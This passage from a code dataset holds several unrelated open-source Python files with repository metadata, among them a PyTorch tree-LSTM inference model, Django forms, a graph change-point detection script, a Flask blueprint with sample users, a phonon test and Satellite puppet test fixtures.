pack_padded_sequence, pad_packed_sequence\n\n\ndef ortho_weight(ndim):\n\t\"\"\"\n\tRandom orthogonal weights\n\tUsed by norm_weights(below), in which case, we\n\tare ensuring that the rows are orthogonal\n\t(i.e W = U \\Sigma V, U has the same\n\t# of rows, V has the same # of 
cols)\n\t\"\"\"\n\tW = np.random.randn(ndim, ndim)\n\tu, s, v = np.linalg.svd(W)\n\treturn u.astype('float32')\n\n# mapping from scalar to vector\ndef map_label_to_target(label,num_classes):\n\ttarget = torch.Tensor(1,num_classes)\n\tceil = int(math.ceil(label))\n\tfloor = int(math.floor(label))\n\tif ceil==floor:\n\t\ttarget[0][floor-1] = 1\n\telse:\n\t\ttarget[0][floor-1] = ceil - label\n\t\ttarget[0][ceil-1] = label - floor\n\treturn target\n\ndef map_label_to_target_sentiment(label, num_classes = 0 ,fine_grain = False):\n\t# num_classes not use yet\n\ttarget = torch.LongTensor(1)\n\ttarget[0] = int(label) # nothing to do here as we preprocess data\n\treturn target\n\nclass BinaryTreeLeafModule(nn.Module):\n\n\tdef __init__(self, cuda, in_dim, mem_dim):\n\t\tsuper(BinaryTreeLeafModule, self).__init__()\n\t\tself.cudaFlag = cuda\n\t\tself.in_dim = in_dim\n\t\tself.mem_dim = mem_dim\n\n\t\tself.cx = nn.Linear(self.in_dim, self.mem_dim)\n\t\tself.ox = nn.Linear(self.in_dim, self.mem_dim)\n\t\tif self.cudaFlag:\n\t\t\tself.cx = self.cx.cuda()\n\t\t\tself.ox = self.ox.cuda()\n\n\tdef forward(self, input):\n\t\tc = self.cx(input)\n\t\to = F.sigmoid(self.ox(input))\n\t\th = o * F.tanh(c)\n\t\treturn c, h\n\nclass BinaryTreeComposer(nn.Module):\n\n\tdef __init__(self, cuda, in_dim, mem_dim):\n\t\tsuper(BinaryTreeComposer, self).__init__()\n\t\tself.cudaFlag = cuda\n\t\tself.in_dim = in_dim\n\t\tself.mem_dim = mem_dim\n\n\t\tdef new_gate():\n\t\t\tlh = nn.Linear(self.mem_dim, self.mem_dim, bias=False)\n\t\t\trh = nn.Linear(self.mem_dim, self.mem_dim, bias=False)\n\t\t\tlh.weight.data.copy_(torch.from_numpy(ortho_weight(self.mem_dim)))\n\t\t\trh.weight.data.copy_(torch.from_numpy(ortho_weight(self.mem_dim)))\n\t\t\treturn lh, rh\n\n\t\tdef new_W():\n\t\t\tw = nn.Linear(self.in_dim, self.mem_dim)\n\t\t\tw.weight.data.copy_(torch.from_numpy(ortho_weight(self.mem_dim)))\n\t\t\treturn w\n\n\t\tself.ilh, self.irh = new_gate()\n\t\tself.lflh, self.lfrh = new_gate()\n\t\tself.rflh, self.rfrh = new_gate()\n\t\tself.ulh, self.urh = new_gate()\n\t\tself.olh, self.orh = new_gate()\n\n\t\tself.cx = new_W()\n\t\tself.ox = new_W()\n\t\tself.fx = new_W()\n\t\tself.ix = new_W()\n\n\t\tif self.cudaFlag:\n\t\t\tself.ilh = self.ilh.cuda()\n\t\t\tself.irh = self.irh.cuda()\n\t\t\tself.lflh = self.lflh.cuda()\n\t\t\tself.lfrh = self.lfrh.cuda()\n\t\t\tself.rflh = self.rflh.cuda()\n\t\t\tself.rfrh = self.rfrh.cuda()\n\t\t\tself.ulh = self.ulh.cuda()\n\t\t\tself.urh = self.urh.cuda()\n\t\t\tself.olh = self.olh.cuda()\n\t\t\tself.orh = self.orh.cuda()\n\n\tdef forward(self, input, lc, lh , rc, rh):\n\t\tu = F.tanh(self.cx(input) + self.ulh(lh) + self.urh(rh))\n\t\ti = F.sigmoid(self.ix(input) + self.ilh(lh) + self.irh(rh))\n\t\tlf = F.sigmoid(self.fx(input) + self.lflh(lh) + self.lfrh(rh))\n\t\trf = F.sigmoid(self.fx(input) + self.rflh(lh) + self.rfrh(rh))\n\t\tc = i* u + lf*lc + rf*rc\n\t\to = F.sigmoid(self.ox(input) + self.olh(lh) + self.orh(rh))\n\t\th = o * F.tanh(c)\n\t\treturn c, h\n\nclass BinaryTreeLSTM(nn.Module):\n\tdef __init__(self, cuda, in_dim, mem_dim, word_embedding, num_words):\n\t\tsuper(BinaryTreeLSTM, self).__init__()\n\t\tself.cudaFlag = cuda\n\t\tself.in_dim = in_dim\n\t\tself.mem_dim = mem_dim\n\t\tself.word_embedding=word_embedding\n\t\tself.num_words=num_words\n\n\t\t#self.leaf_module = BinaryTreeLeafModule(cuda,in_dim, mem_dim)\n\t\tself.composer = BinaryTreeComposer(cuda, in_dim, mem_dim)\n\t\tself.output_module = None\n\t\tself.all_ststes=[]\n\t\tself.all_words=[]\n\n\tdef 
set_output_module(self, output_module):\n\t\tself.output_module = output_module\n\n\tdef getParameters(self):\n\t\t\"\"\"\n\t\tGet flatParameters\n\t\tnote that getParameters and parameters is not equal in this case\n\t\tgetParameters do not get parameters of output module\n\t\t:return: 1d tensor\n\t\t\"\"\"\n\t\tparams = []\n\t\tfor m in [self.ix, self.ih, self.fx, self.fh, self.ox, self.oh, self.ux, self.uh]:\n\t\t\t# we do not get param of output module\n\t\t\tl = list(m.parameters())\n\t\t\tparams.extend(l)\n\n\t\tone_dim = [p.view(p.numel()) for p in params]\n\t\tparams = F.torch.cat(one_dim)\n\t\treturn params\n\n\tdef forward(self, tree, embs, PAD):\n\n\t\tif tree.num_children == 0:\n\t\t\tlc = Variable(torch.zeros(1, self.mem_dim))\n\t\t\tlh = Variable(torch.zeros(1, self.mem_dim))\n\t\t\trc = Variable(torch.zeros(1, self.mem_dim))\n\t\t\trh = Variable(torch.zeros(1, self.mem_dim))\n\t\t\tif torch.cuda.is_available():\n\t\t\t\tlc = lc.cuda()\n\t\t\t\tlh = lh.cuda()\n\t\t\t\trc = rc.cuda()\n\t\t\t\trh = rh.cuda()\n\t\t\ttree.state = self.composer.forward(embs[tree.idx-1], lc, lh, rc, rh)\n\t\t\tself.all_ststes.append(tree.state[1].view(1, self.mem_dim))\n\t\t\t#self.all_words.append(embs[tree.idx-1])\n\t\telse:\n\t\t\tfor idx in xrange(tree.num_children):\n\t\t\t\t_ = self.forward(tree.children[idx], embs, PAD)\n\n\t\t\tlc, lh, rc, rh = self.get_child_state(tree)\n\t\t\tif PAD:\n\t\t\t\tindex = Variable(torch.LongTensor([self.num_words-1]))\n\t\t\t\tif torch.cuda.is_available():\n\t\t\t\t\tindex=index.cuda()\n\t\t\t\ttree.state = self.composer.forward(self.word_embedding(index),lc, lh, rc, rh)\n\t\t\telse:\n\t\t\t\ttree.state = self.composer.forward(embs[tree.idx - 1], lc, lh, rc, rh)\n\t\t\tself.all_ststes.append(tree.state[1].view(1,self.mem_dim))\n\t\t\t#self.all_words.append(self.word_embedding[self.num_words-1])\n\n\t\treturn tree.state#, loss\n\n\tdef get_child_state(self, tree):\n\t\tlc, lh = tree.children[0].state\n\t\trc, rh = tree.children[1].state\n\t\treturn lc, lh, rc, rh\n\nclass ESIM(nn.Module):\n\t\"\"\"\n\t\tImplementation of the multi feed forward network model described in\n\t\tthe paper \"A Decomposable Attention Model for Natural Language\n\t\tInference\" by Parikh et al., 2016.\n\n\t\tIt applies feedforward MLPs to combinations of parts of the two sentences,\n\t\twithout any recurrent structure.\n\t\"\"\"\n\tdef __init__(self, num_units, num_classes, vocab_size, embedding_size, pretrained_emb, num_words):\n\t\tsuper(ESIM, self).__init__()\n\t\tself.vocab_size=vocab_size\n\t\tself.num_units = num_units\n\t\tself.num_classes = num_classes\n\t\tself.embedding_size=embedding_size\n\t\tself.pretrained_emb=pretrained_emb\n\n\t\tself.dropout = nn.Dropout(p=0.5)\n\t\tself.word_embedding=nn.Embedding(vocab_size,embedding_size)\n\n\t\tself.tree_lstm_intra=BinaryTreeLSTM(torch.cuda.is_available(),embedding_size,num_units, self.word_embedding, num_words)\n\n\t\tself.linear_layer_compare = nn.Sequential(nn.Linear(4*num_units, num_units), nn.ReLU(), nn.Dropout(p=0.5))\n\t\t# nn.Dropout(p=0.2), nn.Linear(num_units, num_units), nn.ReLU())\n\n\t\tself.tree_lstm_compare=BinaryTreeLSTM(torch.cuda.is_available(),embedding_size,num_units, self.word_embedding, num_words)\n\n\t\tself.linear_layer_aggregate = nn.Sequential(nn.Dropout(p=0.5), nn.Linear(4*num_units, num_units), nn.ReLU(),\n\t\t\t\t\t\t\t\t\t\t\t\t\tnn.Dropout(p=0.5), nn.Linear(num_units, num_classes))\n\n\t\tself.init_weight()\n\n\tdef 
init_weight(self):\n\t\t#nn.init.normal(self.linear_layer_project,mean=0,std=0.1)\n\t\t#print(self.linear_layer_attend[3])\n\t\t#self.linear_layer_attend[1].weight.data.normal_(0, 0.01)\n\t\t#self.linear_layer_attend[1].bias.data.fill_(0)\n\t\t#self.linear_layer_attend[4].weight.data.normal_(0, 0.01)\n\t\t#self.linear_layer_attend[4].bias.data.fill_(0)\n\t\tself.linear_layer_compare[0].weight.data.normal_(0, 0.01)\n\t\tself.linear_layer_compare[0].bias.data.fill_(0)\n\t\t#self.linear_layer_compare[4].weight.data.normal_(0, 0.01)\n\t\t#self.linear_layer_compare[4].bias.data.fill_(0)\n\t\tself.linear_layer_aggregate[1].weight.data.normal_(0, 0.01)\n\t\tself.linear_layer_aggregate[1].bias.data.fill_(0)\n\t\tself.linear_layer_aggregate[4].weight.data.normal_(0, 0.01)\n\t\tself.linear_layer_aggregate[4].bias.data.fill_(0)\n\t\tself.word_embedding.weight.data.copy_(torch.from_numpy(self.pretrained_emb))\n\n\tdef attention_softmax3d(self,raw_attentions):\n\t\treshaped_attentions = raw_attentions.view(-1, raw_attentions.size(2))\n\t\tout=nn.functional.softmax(reshaped_attentions, dim=1)\n\t\treturn out.view(raw_attentions.size(0),raw_attentions.size(1),raw_attentions.size(2))\n\n\tdef _transformation_input(self,embed_sent, tree, PAD=True):\n\n\t\tembed_sent = self.word_embedding(embed_sent)\n\t\tembed_sent = self.dropout(embed_sent)\n\t\t#print('intra:')\n\t\t#print(embed_sent)\n\t\t_=self.tree_lstm_intra(tree, embed_sent, PAD)\n\t\t#print(len(self.tree_lstm_intra.all_ststes))\n\t\toutput=torch.cat(self.tree_lstm_intra.all_ststes,0)\n\t\t#embed_sent=torch.cat(self.tree_lstm_intra.all_words,0)\n\t\tdel self.tree_lstm_intra.all_ststes[:]\n\t\t#del self.tree_lstm_intra.all_words[:]\n\t\t#gc.collect()\n\t\treturn output\n\n\tdef attend(self,sent1,sent2):\n\n\t\trepr2=torch.transpose(sent2,1,2)\n\t\tself.raw_attentions = torch.matmul(sent1, repr2)\n\t\tatt_sent1 = self.attention_softmax3d(self.raw_attentions)\n\t\tbeta = torch.matmul(att_sent1, sent2)\n\n\t\traw_attentions_t = torch.transpose(self.raw_attentions, 1, 2).contiguous()\n\t\tatt_sent2 = self.attention_softmax3d(raw_attentions_t)\n\t\talpha = torch.matmul(att_sent2, sent1)\n\n\t\treturn alpha, beta\n\n\tdef compare(self,sentence,soft_alignment, tree, PAD=False):\n\n\t\tsent_alignment=torch.cat([sentence, soft_alignment, sentence-soft_alignment, sentence * soft_alignment],2)\n\t\tsent_alignment = self.linear_layer_compare(sent_alignment)\n\t\tsent_alignment = self.dropout(sent_alignment)\n\n\t\t#print('compare:')\n\t\t#print(sent_alignment)\n\t\tsent_alignment=sent_alignment[0]\n\t\t_=self.tree_lstm_compare(tree, sent_alignment,PAD)\n\t\toutput = torch.cat(self.tree_lstm_compare.all_ststes, 0)\n\t\tdel self.tree_lstm_compare.all_ststes[:]\n\t\t#gc.collect()\n\t\treturn output\n\n\tdef aggregate(self,v1, v2):\n\n\t\tv1_mean = torch.mean(v1, 1)\n\t\tv2_mean = torch.mean(v2, 1)\n\t\tv1_max, _ = torch.max(v1, 1)\n\t\tv2_max, _ = torch.max(v2, 1)\n\t\tout = self.linear_layer_aggregate(torch.cat((v1_mean, v1_max, v2_mean, v2_max), 1))\n\n\t\treturn out\n\n\tdef forward(self,sent1, sent2,tree1, tree2):\n\t\tsent1=self._transformation_input(sent1, tree1)\n\t\tsent2=self._transformation_input(sent2, tree2)\n\t\tsent1=torch.unsqueeze(sent1,0)\n\t\tsent2=torch.unsqueeze(sent2,0)\n\t\talpha, beta = self.attend(sent1, sent2)\n\t\tv1=self.compare(sent1,beta, tree1)\n\t\tv2=self.compare(sent2,alpha, tree2)\n\t\tv1 = torch.unsqueeze(v1, 0)\n\t\tv2 = torch.unsqueeze(v2, 0)\n\t\tlogits=self.aggregate(v1,v2)\n\t\treturn 
logits","repo_name":"lanwuwei/SPM_toolkit","sub_path":"ESIM/Tree_IM/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":10236,"program_lang":"python","lang":"en","doc_type":"code","stars":301,"dataset":"github-code","pt":"21"} +{"seq_id":"74665343731","text":"from django import forms\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.models import User\nfrom django.core.validators import MinValueValidator, MaxValueValidator\nfrom .widgets import DatePickerInput, TimePickerInput\nfrom .models import *\n\nclass CreateUserForm(UserCreationForm):\n PROFILE_CATEGORY = (\n ('Student', 'Student'),\n ('Professional', 'Professional'),\n )\n\n DOB = forms.DateField(\n help_text='Required.',\n widget=forms.SelectDateWidget(years=range(1960, 2030))\n )\n Bio = forms.CharField(\n widget=forms.Textarea(attrs={\n 'cols': 30,\n 'rows': 3\n }),\n required=False\n )\n University = forms.CharField(required=False)\n Profession = forms.CharField(\n widget=forms.Select(choices=PROFILE_CATEGORY),\n help_text='Required.'\n )\n #profile_pic = forms.ImageField(required=False)\n\n class Meta:\n model = User\n fields = [\"username\", \"email\", \"first_name\", \"last_name\", \"DOB\", \"Bio\", \"University\", \"Profession\", \"password1\", \"password2\"]\n\nclass UpdateUserForm(forms.ModelForm):\n PROFILE_CATEGORY = (\n ('Student', 'Student'),\n ('Professional', 'Professional'),\n )\n\n DOB = forms.DateField(\n help_text='Required.',\n widget=forms.SelectDateWidget(years=range(1960, 2030))\n )\n Bio = forms.CharField(\n widget=forms.Textarea(attrs={\n 'cols': 30,\n 'rows': 3\n }),\n required=False\n )\n University = forms.CharField(required=False)\n Profession = forms.CharField(\n widget=forms.Select(choices=PROFILE_CATEGORY),\n help_text='Required.'\n )\n profile_pic = forms.ImageField(required=False)\n\n class Meta:\n model = User\n fields = [\"first_name\", \"last_name\", \"DOB\", \"Bio\", \"University\", \"Profession\",\"profile_pic\"]\n\n\nclass addSubject(forms.ModelForm):\n code = forms.CharField(help_text='Required.')\n subject = forms.CharField(help_text='Required.')\n\n class Meta:\n model = Attendance\n fields = [\"code\", \"subject\"]\n\n\nclass addLog(forms.ModelForm):\n EXPENSE_CATEGORY = (\n ('Health', 'Health'),\n ('Education', 'Education'),\n ('Food', 'Food'),\n ('Personal', 'Personal'),\n )\n item = forms.CharField(help_text='Required.')\n price = forms.IntegerField(\n help_text='Required.',\n validators=[MinValueValidator(1)]\n )\n date = forms.DateField(\n help_text='Required.',\n widget= forms.SelectDateWidget(years=range(2010, 2030)),\n initial=timezone.now()\n )\n category = forms.Select(choices=EXPENSE_CATEGORY)\n quantity = forms.IntegerField(\n help_text='Required.',\n validators=[MinValueValidator(1), MaxValueValidator(10)]\n )\n\n class Meta:\n model = Expense\n fields = ['item', 'price', 'date', 'category', 'quantity']\n\n\nclass addPointer(forms.ModelForm):\n SEM_CATEGORY = (\n ('Sem 1', 'Sem 1'),\n ('Sem 2', 'Sem 2'),\n ('Sem 3', 'Sem 3'),\n ('Sem 4', 'Sem 4'),\n ('Sem 5', 'Sem 5'),\n ('Sem 6', 'Sem 6'),\n ('Sem 7', 'Sem 7'),\n ('Sem 8', 'Sem 8'),\n )\n semester = forms.Select(choices=SEM_CATEGORY)\n code = forms.CharField(help_text='Required.')\n subject = forms.CharField(help_text='Required.')\n credits = forms.FloatField(help_text='Required.')\n pointer = forms.IntegerField(\n help_text='Required.',\n validators=[MinValueValidator(1), MaxValueValidator(10)]\n )\n\n class Meta:\n model = Grade\n fields = ['semester', 'code', 'subject', 
'credits', 'pointer']\n\n\nclass addReminders(forms.ModelForm):\n code = forms.CharField(help_text='Required.')\n subject = forms.CharField(help_text='Required.')\n task = forms.CharField(\n widget=forms.Textarea(attrs={\n 'cols': 30,\n 'rows': 3\n }),\n help_text='Required.'\n )\n date = forms.DateField(\n help_text='Required.',\n widget=DatePickerInput\n )\n time = forms.TimeField(\n help_text='Required.',\n widget=TimePickerInput\n )\n\n class Meta:\n model = Reminders\n fields = ['code','subject','task','date', 'time']\n\n widgets = {\n 'date': DatePickerInput(),\n 'time': TimePickerInput(),\n }","repo_name":"akshitajindal/SelfFolio","sub_path":"SelfFolio/SelF/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":4357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19552830386","text":"import math\nimport numpy as np\nimport networkx as nx\nimport matplotlib.pyplot as plt\nimport random\nfrom scipy.linalg import subspace_angles\nimport csv\n\n### HELPER FUNCTIONS ###\n\ndef subspace_dist(A, B):\n '''\n Inputs: \n A, B - Two subspaces (columns of each matrix are basis for the subspace)\n Outputs: The distance between the two subspaces, defined as the Frobenius norm of the sine of principal angles\n '''\n return np.linalg.norm(np.sin(subspace_angles(A, B)))\n\ndef post_change_subspace(alpha, n, k):\n '''\n Inputs: \n alpha - index of node with highest node-centrality\n n - num of nodes\n k - dimension of subspace to use\n Outputs: Expected leading eigenvector\n '''\n eig = 0.0*np.ones((n, 1))\n eig[alpha, 0] += 1\n return eig\n\n \ndef save_gamma_hats_csv(param_hats):\n '''\n Save csv of estimate post-change parameter values over time\n Returns nothing\n '''\n data = np.array([range(len(param_hats)), param_hats]).T\n file = open('nc_gamma_hats.csv', 'w', newline ='')\n with file: \n header = ['# Index', 'Gamma_hat'] \n writer = csv.writer(file) \n writer.writerow(header)\n writer.writerows(data)\n \ndef save_cusum_csv(cusum, cs):\n '''\n Save csv of cusum value over time for different values of c\n Returns nothing\n '''\n\n data = [range(len(cusum[cs[0]]))]\n for c in cs:\n data.append(cusum[c])\n data = np.array(data).T\n headers = [str(c) for c in cs]\n\n file = open('nc_cusum.csv', 'w', newline ='')\n with file: \n header = ['# Index'] + headers\n writer = csv.writer(file)\n writer.writerow(header)\n writer.writerows(data)\n\ndef save_adjacency_csv(A, name):\n '''\n Save csv of adjacency matrix with given name (A0 or A1)\n Returns nothing\n '''\n np.savetxt('ef_' + name + '.csv', A, delimiter=\",\")\n\nif __name__ == \"__main__\":\n\n ### INITIAL GRAPH: ERDOS-RENYI(n, p) ###\n\n n = 100 # number of nodes\n p = 2*math.log(n)/n\n\n G0 = nx.generators.random_graphs.erdos_renyi_graph(n, p)\n A0 = nx.to_numpy_matrix(G0)\n\n ### POST-CHANGE GRAPH: SBM (2 COMMUNITIES) ###\n m_param = 1\n G1 = nx.generators.random_graphs.barabasi_albert_graph(n, m_param)\n ec = nx.eigenvector_centrality(G1)\n centrality = [ec[i] for i in range(n)]\n max_centrality_node = np.argmax(centrality)\n\n A1_old = nx.to_numpy_matrix(G1)\n\n perm = np.random.permutation(100)\n alpha = np.where(perm == max_centrality_node)[0][0]\n print(alpha)\n A1 = np.zeros(A1_old.shape)\n for i in range(n):\n for j in range(i+1):\n A1[i, j] = A1_old[perm[i], perm[j]]\n A1[j, i] = A1_old[perm[i], perm[j]]\n\n # plt.imshow(A0)\n # plt.title(\"Initial Adjacency Matrix\")\n # plt.show()\n # plt.imshow(A1)\n # plt.title(\"Post-Change Adjacency Matrix\")\n # 
plt.show()\n\n\n # ### GENERATE SIGNALS ###\n\n # Define graph filter\n poly = lambda x: x**2\n H0 = poly(A0)\n H1 = poly(A1)\n\n # Signal parameters\n m = 1000 # number of signals to generate\n t_cp = 600 # index of change point\n\n # Generate signals\n W = np.random.multivariate_normal(np.zeros(n), np.eye(n), m).T\n Y0 = np.dot(H0, W[:, 0:t_cp])\n Y1 = np.dot(H1, W[:, t_cp:m+1])\n Y = np.concatenate((Y0, Y1), axis=1)\n\n # ### DETECTION SETUP ###\n\n k = 1 # Number of eigenvectors to consider\n cusum = {} # dictionary from c -> cusum score over time\n cs = [0.0, 0.05, 0.10] # values of c to try\n window_size = 50 # For covariance estimates\n\n wA, U = np.linalg.eigh(A0)\n U0 = U[:, -k:] # Initial subspace\n\n alphas = np.array(range(100)) # Possible parameter values (alpha = index of node with highest eigenvector centrality)\n U1 = {a:post_change_subspace(a, n, k) for a in alphas} # Dict alpha: subspace(alpha)\n\n\n\n\n # ### DETECTION ###\n alpha_hats = []\n alphas_saved = False\n\n for c in cs:\n cusum[c] = [0]\n for i in range(m - window_size + 1):\n window = Y[:, i:i+window_size] # Signals in the current window\n C_hat = (1/window_size) * np.dot(window, window.T) # Empirical covariance\n wCs, Us = np.linalg.eigh(C_hat)\n U_hat = Us[:, -k:] # observed subspace\n alpha_hat = max(alphas, key=lambda a: np.linalg.norm(U1[a].T @ U_hat)) # Parameter estimate\n if not alphas_saved:\n alpha_hats.append(alpha_hat)\n Lt = subspace_dist(U0, U1[alpha_hat]) - subspace_dist(U_hat, U1[alpha_hat]) - c\n cusum[c].append(max(0, cusum[c][-1] + Lt))\n alphas_saved = True\n\n\n\n # plt.plot(alpha_hats)\n # plt.xlabel('Index')\n # plt.ylabel('Predicted Value')\n # plt.title('Predicted Parameter Value Over Time')\n # plt.axvline(x=t_cp, color='r')\n # plt.show()\n\n save_gamma_hats_csv(alpha_hats)\n\n # for c in cs:\n # plt.plot(cusum[c])\n\n # plt.legend(cs)\n # plt.xlabel('Index')\n # plt.ylabel('CUSUM Score')\n # plt.title('Running CUSUM Statistic')\n # plt.axvline(x=t_cp, color='r')\n # plt.show()\n\n save_cusum_csv(cusum, cs)\n\n\n\n\n\n\n","repo_name":"chiraagk7/graph-cusum","sub_path":"Node Centrality Change/node_centrality_cpd.py","file_name":"node_centrality_cpd.py","file_ext":"py","file_size_in_byte":5091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"1616652647","text":"from pprint import pprint as pp\nimport requests\nimport string\nimport shoplist_v1_0 as sl\nimport shoplist_v1_1 as sl2\n\n\"\"\"\nThis module builds a shopping list for a few letters and saves it to a file\n\"\"\"\n\n\ndef main():\n # letters = string.ascii_lowercase\n recipe_list_all_letters = []\n letters = 'ad'\n for letter in letters:\n meals_a_json = sl.request_recipe(letter)\n recipe_list = sl.get_recipe_list(meals_a_json)\n for meals_dict in recipe_list:\n recipe_list_all_letters.append(meals_dict)\n print(recipe_list_all_letters)\n dict_of_meals = sl.get_recipe(recipe_list_all_letters)\n ingredients_list = sl.get_ingredients_list(dict_of_meals)\n ingredients_dictionary = sl.get_ingredients_dict(ingredients_list)\n sl2.export_to_csv(ingredients_dictionary)\n\n print(f'---------------------Recipe names:------------------------')\n sl.get_names_of_recipes(recipe_list_all_letters)\n\n\nif __name__ == '__main__':\n
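# Entry point: build the shopping list for the letters configured above and export it to a CSV file.\n 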
main()\n","repo_name":"DominikaJastrzebska/project_shoplist_1.0","sub_path":"shoplist_v2_0.py","file_name":"shoplist_v2_0.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22177917820","text":"from flask import Blueprint, render_template, url_for\nfrom pybo import db\nfrom pybo.models import User_info, Question, Answer\nimport os\nfrom datetime import datetime\nfrom werkzeug.utils import import_string, redirect\n\n# basdir = os.path.abspath(os.path.dirname(__file__))\n# dbfile = os.path.join(basdir, 'db.sqlite')\n\nbp = Blueprint('main', __name__, url_prefix='/')\n\n\n@bp.route('/hello')\ndef hello_pybo():\n q1 = User_info(id='abc', pw='ab123', name='가나다', age=20, addr='서울', birth='020101', sex='m', create_date='210101')\n q2 = User_info(id='def', pw='de456', name='마바사', age=21, addr='부산', birth='010101', sex='f', create_date='210102')\n q3 = User_info(id='ghi', pw='gh789', name='아자차', age=22, addr='대전', birth='000101', sex='m', create_date='210301')\n q4 = User_info(id='jkl', pw='jk321', name='카타파', age=23, addr='울산', birth='990101', sex='f', create_date='210403')\n q5 = User_info(id='mno', pw='mn654', name='하거너', age=24, addr='광주', birth='980101', sex='m', create_date='210203')\n q6 = User_info(id='pqr', pw='pq987', name='더러머', age=25, addr='제주', birth='970101', sex='f', create_date='210305')\n q7 = User_info(id='stu', pw='st135', name='버서어', age=26, addr='강원', birth='960101', sex='m', create_date='200203')\n q8 = User_info(id='vwx', pw='vw246', name='저처커', age=27, addr='청주', birth='950101', sex='f', create_date='190503')\n q9 = User_info(id='yza', pw='yz369', name='허고노', age=28, addr='대구', birth='940101', sex='m', create_date='210813')\n q10 = User_info(id='bcd', pw='bc012', name='도로모', age=29, addr='경기', birth='930101', sex='f', create_date='201224')\n\n db.session.add(q1)\n db.session.add(q2)\n db.session.add(q3)\n db.session.add(q4)\n db.session.add(q5)\n db.session.add(q6)\n db.session.add(q7)\n db.session.add(q8)\n db.session.add(q9)\n db.session.add(q10)\n db.session.commit()\n return 'Hello, Pybo!'\n\n\n@bp.route('/')\ndef index():\n return redirect(url_for('question._list'))\n\n# @bp.route('/detail//')\n# def detail(question_id):\n# question = Question.query.get_or_404(question_id)\n# return render_template('question/detail.html', question=question)\n\n\n\n\n# @bp.route('/hello')\n# def hello_pybo():\n# result = Question.query.filter(Question.id=1).all\n# result = Question.query.get(1) #id(primary key)가 1번데이터를 가져옴\n# q = Question.query.get(2)\n# print(q)\n# # a = Answer(question = q, content='답변 3번', create_date=datetime.now())\n# # db.session.add(a)\n#\n# db.session.commit()\n#\n# return 'Hello, Pybo!'\n\n","repo_name":"v2rgo91/Myproject","sub_path":"pybo/views/main_views.py","file_name":"main_views.py","file_ext":"py","file_size_in_byte":2658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19023833720","text":"import cellconstructor as CC\nimport cellconstructor.Phonons\n\nimport sys, os\nimport numpy as np\n\nEPS = 1e-8\n\ndef test_get_harmonic_energy_force():\n total_path = os.path.dirname(os.path.abspath(__file__))\n os.chdir(total_path)\n\n # Load the dynamical matrix\n dyn = CC.Phonons.Phonons(\"PbTe.dyn\", 8)\n super_struct = dyn.structure.generate_supercell(dyn.GetSupercell())\n \n # Generate a set of structures\n structs = dyn.ExtractRandomStructures(20, 300)\n xats = np.array([x.coords for x in 
structs])\n u_disps = xats - np.tile(super_struct.coords, (len(structs), 1,1))\n u_disps = u_disps.reshape((len(structs), 3 * super_struct.N_atoms))\n\n super_dyn = dyn.GenerateSupercellDyn(dyn.GetSupercell())\n\n en1, forc1 = dyn.get_energy_forces(None, displacement = u_disps)\n en2, forc2 = super_dyn.get_energy_forces(None, displacement = u_disps)\n\n en_dist = np.max(np.abs(en1 - en2))\n assert en_dist < EPS, \"Error, energy difference between two methods: {}\".format(en_dist)\n f_dist = np.max(np.abs(forc1 - forc2))\n assert f_dist < EPS, \"Error, the force difference between two methods: {}\".format(f_dist)\n\n \nif __name__ == \"__main__\":\n test_get_harmonic_energy_force()\n","repo_name":"SSCHAcode/CellConstructor","sub_path":"tests/TestHarmEnergyForce/test_supercell_harm_energy_force.py","file_name":"test_supercell_harm_energy_force.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"21"} +{"seq_id":"38460318526","text":"# -*- encoding: utf-8 -*-\n\"\"\"Test class for Puppet Smart Variables\n\n:Requirement: Variables\n\n:CaseAutomation: Automated\n\n:CaseLevel: Acceptance\n\n:CaseComponent: UI\n\n:TestType: Functional\n\n:CaseImportance: High\n\n:Upstream: No\n\"\"\"\nimport yaml\nfrom nailgun import entities\n\nfrom robottelo.api.utils import publish_puppet_module\nfrom robottelo.constants import DEFAULT_LOC_ID, CUSTOM_PUPPET_REPO, ENVIRONMENT\nfrom robottelo.datafactory import gen_string\nfrom robottelo.decorators import tier2, upgrade, fixture\n\nPUPPET_MODULES = [\n {'author': 'robottelo', 'name': 'ui_test_variables'}]\n\n\n@fixture(scope='module')\ndef module_org():\n return entities.Organization().create()\n\n\n@fixture(scope='module')\ndef module_loc():\n return entities.Location(id=DEFAULT_LOC_ID).read()\n\n\n@fixture(scope='module')\ndef content_view(module_org):\n return publish_puppet_module(\n PUPPET_MODULES, CUSTOM_PUPPET_REPO, module_org)\n\n\n@fixture(scope='module')\ndef puppet_env(content_view, module_org):\n return entities.Environment().search(\n query={'search': u'content_view=\"{0}\" and organization_id={1}'.format(\n content_view.name, module_org.id)}\n )[0]\n\n\n@fixture(scope='module')\ndef puppet_class(puppet_env):\n puppet_class_entity = entities.PuppetClass().search(query={\n 'search': u'name = \"{0}\" and environment = \"{1}\"'.format(\n PUPPET_MODULES[0]['name'], puppet_env.name)})[0]\n # We need to have at least one variable created to unblock WebUI for Smart\n # Variable interface page\n if len(entities.SmartVariable(\n puppetclass=puppet_class_entity).search({'puppetclass'})) == 0:\n entities.SmartVariable(puppetclass=puppet_class_entity).create()\n return puppet_class_entity\n\n\n@fixture(scope='module')\ndef puppet_subclasses(puppet_env):\n return entities.PuppetClass().search(query={\n 'search': u'name ~ \"{0}::\" and environment = \"{1}\"'.format(\n PUPPET_MODULES[0]['name'], puppet_env.name)\n })\n\n\n@fixture(scope='module')\ndef module_host(\n module_org, module_loc, content_view, puppet_env, puppet_class):\n lce = entities.LifecycleEnvironment().search(\n query={\n 'search': 'organization_id=\"{0}\" and name=\"{1}\"'.format(\n module_org.id, ENVIRONMENT)\n })[0]\n host = entities.Host(\n organization=module_org,\n location=module_loc,\n content_facet_attributes={\n 'content_view_id': content_view.id,\n 'lifecycle_environment_id': lce.id,\n }).create()\n host.environment = puppet_env\n host.update(['environment'])\n 
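# Attach the example puppet class to the host so its smart variables can be exercised by the UI tests below.\n 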
